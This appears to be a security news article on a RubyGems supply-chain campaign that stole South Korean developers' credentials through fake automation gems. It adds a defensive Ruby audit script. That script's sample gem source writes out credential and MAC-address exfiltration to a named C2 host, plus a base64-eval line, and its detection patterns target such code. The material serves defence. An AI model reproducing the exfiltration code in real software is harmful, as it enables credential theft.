The RubyGems ecosystem, a cornerstone of the Ruby development community, has been systematically compromised by a long-running credential theft campaign. Security researchers at Socket have exposed 60 malicious gems downloaded over 275,000 times since March 2023, posing a severe supply chain threat primarily targeting South Korean developers using automation tools.

Deceptive Packages, Real Theft
Published under aliases like zon, nowon, kwonsoonje, and soonje, the gems masqueraded as legitimate tools for interacting with popular platforms:

  • Social Media/Tools: wp_posting_duo, wp_posting_zon (WordPress), tg_send_duo, tg_send_zon (Telegram)
  • SEO/Blogging: backlink_zon, back_duo, nblog_duo, nblog_zon, tblog_duopack
  • Naver/Kakao: cafe_basics_duo, cafe_buy_duo, *_blog_comment, *_cafe_comment

These gems presented convincing graphical user interfaces (GUIs) mimicking their advertised functionality. However, beneath the surface lurked malicious code designed for one purpose: credential exfiltration.

The Attack Mechanism
Upon execution, the gems acted as sophisticated phishing tools. When users entered credentials into the seemingly legitimate login forms:

  1. Data Harvesting: Usernames, passwords (in plaintext), device MAC addresses (for fingerprinting), and the specific package name were captured.
  2. Exfiltration: Data was sent to hardcoded command-and-control (C2) servers like programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.
  3. Deception: Users often received fake success or failure messages, while no actual API call to the intended service occurred.

Malicious code snippet responsible for credential theft found in the gems. (Source: Socket)

Socket researchers confirmed the real-world impact by discovering harvested credential logs on Russian-speaking darknet markets, directly linked to traffic from marketingduo[.]co[.]kr.

Infostealer logs on darknet markets linked to the RubyGems campaign. (Source: Socket)

An Enduring Threat and Ecosystem Vulnerability
This incident is not isolated. Socket previously reported typosquatting attacks against Fastlane tools on RubyGems in June. Alarmingly, despite Socket reporting all 60 malicious gems:

"At least 16 of the 60 malicious Ruby gems remain available..."

This persistence highlights the ongoing challenge of promptly purging malicious actors from open-source repositories.

Mitigating Supply Chain Risk
This campaign underscores critical security practices for developers:

  1. Scrutinize Dependencies: Vigilantly examine libraries, especially lesser-known ones, for suspicious code (e.g., obfuscation, unexpected network calls).
  2. Assess Publisher Reputation: Check the publisher's history, other packages, and overall account legitimacy on the repository.
  3. Lock Dependencies: Pin dependencies to specific, vetted versions (known to be safe) to prevent automatic updates to potentially malicious new releases.
  4. Leverage Security Tooling: Utilize tools like Socket that proactively analyze packages for risk signals beyond just known vulnerabilities.
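As an added example (not code from Socket or from the article), the Ruby script below turns the attack indicators described under "The Attack Mechanism" and the first three mitigation steps above into checks a developer can run locally: it matches dependency names against the gem names the article lists, flags source text that references the C2 hosts the article names or carries the signals it describes (outbound HTTP, base64-plus-eval obfuscation, MAC-address collection next to credential fields), and audits a Gemfile for exact version pins. The regexes, the `risk_report` severity levels, and the sample Gemfile and gem source are constructed assumptions for the demo, not Socket's detection rules or the real gems' code.

```ruby
# Added example: heuristic dependency audit for the RubyGems campaign indicators.
# Patterns and severity levels are assumptions for illustration, not Socket's rules.

# C2 hosts named in the article (written there de-fanged as programzon[.]com etc.).
KNOWN_C2_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze

# Gem names from the article; the wildcards *_blog_comment / *_cafe_comment
# become suffix patterns.
KNOWN_MALICIOUS_GEM_PATTERNS = [
  /\Awp_posting_(duo|zon)\z/, /\Atg_send_(duo|zon)\z/, /\Abacklink_zon\z/,
  /\Aback_duo\z/, /\Anblog_(duo|zon)\z/, /\Atblog_duopack\z/,
  /\Acafe_(basics|buy)_duo\z/, /_blog_comment\z/, /_cafe_comment\z/
].freeze

# Source-level risk signals (assumed heuristics). Regexp.union escapes plain strings itself.
RISK_SIGNALS = {
  known_c2_domain:    Regexp.union(KNOWN_C2_DOMAINS),
  outbound_http:      /\bNet::HTTP\b|\bHTTParty\b|\bFaraday\b|URI\.open|open-uri/,
  obfuscation:        /Base64\.decode64|\beval\s*\(|\.unpack\(\s*["']m/,
  device_fingerprint: /`(ifconfig|ipconfig|getmac)[^`]*`|\bmacaddr\b|getifaddrs/i,
  credential_fields:  /\b(password|passwd|pw)\b\s*(:|=>)/
}.freeze

def flagged_gem_name?(name)
  KNOWN_MALICIOUS_GEM_PATTERNS.any? { |re| name.match?(re) }
end

# Returns the sorted signal names whose pattern occurs in the source text.
def scan_source(source)
  RISK_SIGNALS.select { |_, re| source.match?(re) }.keys.sort
end

# Parses `gem "name", "requirement"` lines. A dependency counts as pinned only when
# its first requirement is an exact version ("1.2.3" or "= 1.2.3"); "~>" and ">="
# still allow an unvetted newer release to be pulled in.
def audit_gemfile(gemfile_text)
  gemfile_text.each_line.filter_map do |line|
    m = line.match(/\A\s*gem\s+["']([^"']+)["'](?:\s*,\s*["']([^"']+)["'])?/)
    next unless m
    name, req = m[1], m[2]
    pinned = !req.nil? && req.strip.match?(/\A(=\s*)?\d+(\.\d+)*\z/)
    { name: name, requirement: req, pinned: pinned, known_malicious: flagged_gem_name?(name) }
  end
end

# Combines both checks. `sources` maps a gem name to its source text (read from the
# installed gem directory in practice). Levels are an assumed triage scheme.
def risk_report(gemfile_text, sources)
  audit_gemfile(gemfile_text).map do |dep|
    signals = scan_source(sources.fetch(dep[:name], ""))
    level = if dep[:known_malicious] || signals.include?(:known_c2_domain) then :block
            elsif signals.size >= 2 then :review
            elsif dep[:pinned] then :ok
            else :unpinned
            end
    dep.merge(signals: signals, level: level)
  end
end

# Constructed sample Gemfile; "nblog_zon" mirrors a name from the article.
SAMPLE_GEMFILE = <<~GEMFILE
  source "https://rubygems.org"
  gem "rails", "7.1.3"
  gem "nokogiri", "~> 1.16"
  gem "nblog_zon"
  gem "rake", ">= 13.0", require: false
GEMFILE

# Constructed, inert text that mimics the pattern the article describes
# (credentials, MAC output and package name sent to a hard-coded host, plus base64+eval).
SAMPLE_GEM_SOURCE = <<~RUBY
  require "net/http"
  require "base64"
  def login(user, pw)
    mac = `ifconfig`
    Net::HTTP.post_form(URI("https://marketingduo.co.kr/api"),
                        user: user, pw: pw, mac: mac, pkg: "nblog_zon")
    eval(Base64.decode64(PAYLOAD))
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  risk_report(SAMPLE_GEMFILE, { "nblog_zon" => SAMPLE_GEM_SOURCE }).each do |r|
    puts format("%-10s %-10s pinned=%-5s signals=%s", r[:name], r[:level], r[:pinned], r[:signals].join(","))
  end
end
```

Running the script prints one triage line per dependency; in the sample, `nblog_zon` is blocked both because its name is on the article's list and because its source references a named C2 host, while `nokogiri` and `rake` are merely reported as unpinned. The heuristics are deliberately noisy: a legitimate gem that makes HTTP calls and decodes base64 will land in `:review`, which is the point of step 1 above, a prompt to read the code rather than a verdict.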

The discovery of hundreds of thousands of downloads over years demonstrates how effectively attackers exploit trust within open-source ecosystems. As RubyGems works to remove the remaining threats, developers must adopt a more defensive stance, recognizing that the convenience of package managers now comes with an inherent responsibility for rigorous security hygiene. The safety of your credentials, and potentially your infrastructure, depends on it.